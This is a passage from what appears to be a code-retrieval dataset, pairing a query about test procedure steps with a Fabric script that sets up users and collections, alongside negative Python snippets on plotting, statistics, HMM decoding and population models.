plt.title(tit3,fontsize=FontSize)\n plt.show()\n print(\"========================================================\")\n print(bNam4)\n print(\"========================================================\")\n Nrow = int(self.n/Ncol)+np.remainder(self.n,Ncol)\n fig,ax = 
plt.subplots(Nrow,Ncol,figsize=FigSize)\n plt.subplots_adjust(wspace=0.25,hspace=0.25)\n if Ncol == 1:\n ax = np.reshape(ax,(self.n,1))\n elif Nrow == 1:\n ax = np.reshape(ax,(1,self.n))\n if xnames == \"num\":\n xnames = []\n for i in range(self.n):\n xnames += [r\"state \"+str(i+1)]\n for row in range(Nrow):\n for col in range(Ncol):\n i = Ncol*row+col\n if i+1 <= self.n:\n ax[row,col].plot(this,xhis[:,i])\n ax[row,col].set_xlabel(r\"time\",fontsize=FontSize)\n LabelName = r\"tracking error: \"+xnames[i]\n ax[row,col].set_ylabel(LabelName,fontsize=FontSize)\n fig.suptitle(tit4,fontsize=FontSize)\n plt.show()\n print(\"========================================================\")\n print(\"==================== SIMULATIOM END ====================\")\n print(\"========================================================\")\n return this,xhis,zhis", "def prjEuler():\r\n #Constants\r\n NUMSTRING = ( \"73167176531330624919225119674426574742355349194934\"\r\n \"96983520312774506326239578318016984801869478851843\"\r\n \"85861560789112949495459501737958331952853208805511\"\r\n \"12540698747158523863050715693290963295227443043557\"\r\n \"66896648950445244523161731856403098711121722383113\"\r\n \"62229893423380308135336276614282806444486645238749\"\r\n \"30358907296290491560440772390713810515859307960866\"\r\n \"70172427121883998797908792274921901699720888093776\"\r\n \"65727333001053367881220235421809751254540594752243\"\r\n \"52584907711670556013604839586446706324415722155397\"\r\n \"53697817977846174064955149290862569321978468622482\"\r\n \"83972241375657056057490261407972968652414535100474\"\r\n \"82166370484403199890008895243450658541227588666881\"\r\n \"16427171479924442928230863465674813919123162824586\"\r\n \"17866458359124566529476545682848912883142607690042\"\r\n \"24219022671055626321111109370544217506941658960408\"\r\n \"07198403850962455444362981230987879927244284909188\"\r\n \"84580156166097919133875499200524063689912560717606\"\r\n \"05886116467109405077541002256983155200055935729725\"\r\n \"71636269561882670428252483600823257530420752963450\" )\r\n \r\n #defined items\r\n greatest_prod = 1\r\n euler_queue = fiveQueue()\r\n \r\n #code\r\n for numIter in NUMSTRING:\r\n if( euler_queue.push( numIter ) ):\r\n temp_prod = euler_queue.product()\r\n if( temp_prod > greatest_prod ):\r\n greatest_prod = temp_prod\r\n \r\n print \"The greatest product is %d\" % greatest_prod\r\n return", "def TST_LCE(S,N1,N_per,alpha,model_C2ST, w_C2ST, b_C2ST, device,dtype):\r\n np.random.seed(seed=1102)\r\n torch.manual_seed(1102)\r\n torch.cuda.manual_seed(1102)\r\n N = S.shape[0]\r\n f = torch.nn.Softmax()\r\n output = f(model_C2ST(S).mm(w_C2ST) + b_C2ST)\r\n # pred_C2ST = output.max(1, keepdim=True)[1]\r\n STAT = abs(output[:N1,0].type(torch.FloatTensor).mean() - output[N1:,0].type(torch.FloatTensor).mean())\r\n STAT_vector = np.zeros(N_per)\r\n for r in range(N_per):\r\n ind = np.random.choice(N, N, replace=False)\r\n # divide into new X, Y\r\n ind_X = ind[:N1]\r\n ind_Y = ind[N1:]\r\n # print(indx)\r\n STAT_vector[r] = abs(output[ind_X,0].type(torch.FloatTensor).mean() - output[ind_Y,0].type(torch.FloatTensor).mean())\r\n S_vector = np.sort(STAT_vector)\r\n threshold = S_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n threshold_lower = S_vector[np.int(np.ceil(N_per * alpha))]\r\n h = 0\r\n if STAT.item() > threshold:\r\n h = 1\r\n return h, threshold, STAT", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in 
range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = phiTemp.max(0)", "def bv2teff_noyes84(BmV):\n logTeff = 3.908 - 0.234*BmV\n return 10 ** logTeff", "def test_put_nveto_pmt_item(self):\n pass", "def verhulst(nb_init, t0, tf, eps, methode, gamma, K) :\n f=lambda y,t : gamma*y*(1-y/K)\n Y=meth_epsilon(nb_init, t0, tf, eps, f, methode)\n return Y", "def condition_tpm(self,tpm, fixed_nodes, state):\n conditioning_indices = [[slice(None)]] * len(state)\n for i in fixed_nodes:\n # Preserve singleton dimensions with `np.newaxis`\n conditioning_indices[i] = [state[i], np.newaxis]\n # Flatten the indices.\n conditioning_indices = list(chain.from_iterable(conditioning_indices))\n # Obtain the actual conditioned TPM by indexing with the conditioning\n # indices.\n return tpm[tuple(conditioning_indices)]" ]
[ "0.60359097", "0.57987505", "0.57006055", "0.56011873", "0.55925214", "0.5585051", "0.55665624", "0.55553573", "0.55482876", "0.5474939", "0.5453688", "0.5451362", "0.5410539", "0.540798", "0.54051346", "0.53952694", "0.5374782", "0.5306764", "0.529368", "0.5291805", "0.5266997", "0.52642155", "0.5263579", "0.52629596", "0.52576226", "0.5255918", "0.52539307", "0.5246281", "0.5243777", "0.52420783", "0.5236567", "0.5234393", "0.52333516", "0.5222849", "0.5222506", "0.5216175", "0.52156645", "0.5207879", "0.5202502", "0.5202053", "0.5183319", "0.51806957", "0.51802164", "0.51792824", "0.51780075", "0.5168686", "0.51591843", "0.5153175", "0.5141934", "0.51377934", "0.5125655", "0.5122806", "0.5093584", "0.5091972", "0.508602", "0.50794125", "0.5065431", "0.5060242", "0.5059197", "0.5055429", "0.50503534", "0.50456613", "0.50454193", "0.5038145", "0.5032157", "0.5027945", "0.5023213", "0.50205517", "0.5017924", "0.50165254", "0.50126743", "0.5012398", "0.50115186", "0.50061107", "0.5004287", "0.5003291", "0.5002768", "0.49898377", "0.49878567", "0.49827918", "0.49800187", "0.49797723", "0.49782142", "0.49759266", "0.49753386", "0.49750325", "0.49735662", "0.49702942", "0.49661687", "0.4965389", "0.49633935", "0.49573943", "0.4951992", "0.49513975", "0.4948265", "0.4947331", "0.49457684", "0.49409312", "0.49390656", "0.4934833", "0.49334392" ]
0.0
-1
Implementation of TPMINVNOM00001 Steps 2 4
def initialize():
    with settings(prompts={'Password: ': 'test', 'Password (again): ': 'test'}):
        for user, group in USER_GROUPS:
            sudo("useradd %s -G %s,minv -g minv -N || true" % (user, group))
            sudo("chmod g+rwx /home/%s" % user)
            sudo('minv_ createuser %s -g %s' % (user, group), user="minv")

    # upload script to create collections
    put(
        join(env.testdata_path, "scripts/initial_collections.sh"),
        "", mode=0755
    )
    sudo("cp initial_collections.sh /home/minv-app-administrator/")

    # upload collection configs
    for conf in glob(join(env.testdata_path, "configurations/*.conf")):
        put(conf, "", mode=0444, use_sudo=True)
        sudo("cp %s /home/minv-app-administrator/" % basename(conf))

    with cd("/home/minv-app-administrator/"):
        sudo("chmod a+rx . *")
        sudo(
            "sh -l ./initial_collections.sh",
            user="minv-app-administrator"
        )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def test_get_nveto_pmts(self):\n pass", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + [\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def 
gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. 
crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n \"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n reporter.addBold(\"S=\"+hex(S))\n # Step 3. Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def prove_N() -> Proof:\n # Optional Task 6.8", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def _r_inv(self):\n raise NotImplementedError", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = []\n \n if 
qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def test_post_nveto_pmts(self):\n pass", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def TCVB0(docs, alpha, beta, epsilon=0.0001, log=no_log):\n D, V = docs.shape\n K = len(alpha)\n\n #store variational q_{z_{d,w} = t} for each d as sparse table in\n #array z\n z = np.zeros(D, dtype=object)\n\n #initialize counts\n #N[t, w] = expectaction of unnormalized phi_{k,w}\n N = np.zeros((V, K), dtype=float)\n\n #Nd[d, t] = unnormalized theta_{d,k}\n Nd = np.zeros((D, K), dtype=float)\n\n for d in xrange(D):\n #random initialization\n init = rand(docs[d].nnz * K)\n active_words = docs[d].nonzero()[1]\n ij = (np.repeat(active_words, K), np.tile(np.arange(K), len(active_words)))\n\n #z[d] is VxK sparse row matrix\n z[d] = csr_matrix((init, ij), shape=(V, K))\n\n 
#normalize z[d]\n z[d] = normalize(z[d], norm='l1', axis=1)\n\n #update counts\n #set_trace()\n M = diag(docs[d]).dot(z[d]).toarray()\n N += M\n Nd[d] = M.sum(axis=0) + alpha\n\n log('document %d/%d preinitialized' % (d + 1, D))\n\n #sum of array and matrix is matrix, so convertion is required\n N = np.asarray(N) + beta\n\n #Nt[t] is pre-computed unnormalized expectation topic t\n Nt = np.squeeze(np.asarray(N.sum(axis=0)))\n if type(beta) is float:\n Nt += V * beta\n elif type(beta) is np.ndarray:\n Nt += beta.sum(axis=0)\n else:\n raise 'beta must be either scalar (float) number for symmetric prior or a full matrix VxK for custom prior'\n\n #do variational updates until convergence\n iteration = 1\n while True:\n iteration_time = time()\n avg_diff = 0.0\n\n #for each document\n for d in xrange(D):\n #for each word in a document\n max_diff = 0.0\n doc_diff = 0.0\n\n doc_w = docs.data[docs.indptr[d]:docs.indptr[d + 1]]\n\n i = 0\n old_z_d = z[d].data.copy()\n #for each word in the document d\n #do variational update and estimate difference\n for w in docs.indices[docs.indptr[d]:docs.indptr[d + 1]]:\n #save old q(z_d) distribution\n old_z = z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] * doc_w[i]\n #we take expectations ignoring current document and current word\n N[w] -= old_z\n Nt[:] -= old_z\n Nd[d] -= old_z\n #update\n new_z = N[w] / Nt * Nd[d]\n #normalization\n new_z /= new_z.sum()\n #write new values back\n z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] = new_z\n #expectations update\n new_z *= doc_w[i]\n N[w] += new_z\n Nt[:] += new_z\n Nd[d] += new_z \n\n i += 1\n\n #word_diff = variational_update(d, w)\n doc_diff += np.abs(old_z_d - z[d].data)\n avg_diff += doc_diff.sum()\n max_diff = max(max_diff, doc_diff.max())\n if d % 100 == 0:\n log('document %d/%d was updated' % (d + 1, D))\n\n avg_diff /= docs.nnz * K\n log('iteration %d. avg diff: %f. max diff: %f. time: %f' % (iteration, avg_diff, max_diff, time() - iteration_time))\n\n if max_diff < epsilon:\n break\n\n iteration += 1\n\n return z", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n temp_vn_array.append(vn_inte)\n return(temp_vn_array)", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def intf_ENTPGRAM(E):\n # !! Need to check for some eids being TRIs. 
Filter that out.\n if ( not inc.entid_or_LST_of_entids(E.The,3) or \n not inc.point_formatted_LST(E.The,2) or\n not inc.point_formatted_LST(E.The,1) ):\n print(\"Input Error: pgram\")\n print(intf_ENTPGRAM.__doc__)\n return # Without doing much of anything.\n oB= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n oA= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n myeids= E.The.StackPop().val\n if type(myeids)==type(list()):\n #myeids= map(lambda x:x.val, myeids) # Should now be a list of ints.\n myeids= [x.val for x in myeids] # Should now be a list of ints.\n else:\n myeids= [ myeids ] # Also a (1 item) list of ints.\n neweidlist= []\n for myeid in myeids:\n if myeid in MMEL.El: # Check if eid exists.\n src_ent= MMEL.El[myeid]\n new_ent= src_ent.duplicate()\n new_ent.translate([ oB[0]-oA[0], oB[1]-oA[1], oB[2]-oA[2] ])\n As= mm.Entity.allplist.PLdict[ src_ent.epts[0] ]\n Ae= mm.Entity.allplist.PLdict[ src_ent.epts[1] ]\n Bs= mm.Entity.allplist.PLdict[ new_ent.epts[0] ]\n Be= mm.Entity.allplist.PLdict[ new_ent.epts[1] ]\n neweidlist.append(new_ent.eid)\n MMEL.add_ent(new_ent)\n line_entS= mm.Line_Entity( [As,Bs] )\n neweidlist.append(line_entS.eid)\n MMEL.add_ent(line_entS)\n line_entE= mm.Line_Entity( [Ae,Be] )\n neweidlist.append(line_entE.eid)\n MMEL.add_ent(line_entE)\n tri_entA= mm.Tri_Entity( [As, Ae, Bs] )\n neweidlist.append(tri_entA.eid)\n MMEL.add_ent(tri_entA)\n tri_entB= mm.Tri_Entity( [Bs, Be, Ae] )\n neweidlist.append(tri_entB.eid)\n MMEL.add_ent(tri_entB)\n else:\n print(\"WARNING: Entity ID# %d does not exist.\" % myeid)\n if neweidlist:\n neweids= objectifier.StackOB_LST( [objectifier.StackOB_VAL(x) for x in neweidlist] )\n E.The.StackPush(neweids)\n OUT.default(MMEL,E) # AUTODUMP ", "def _inv_totient_estimate(m):\n primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def test_nr_trinuc(self):\n preds = [\n 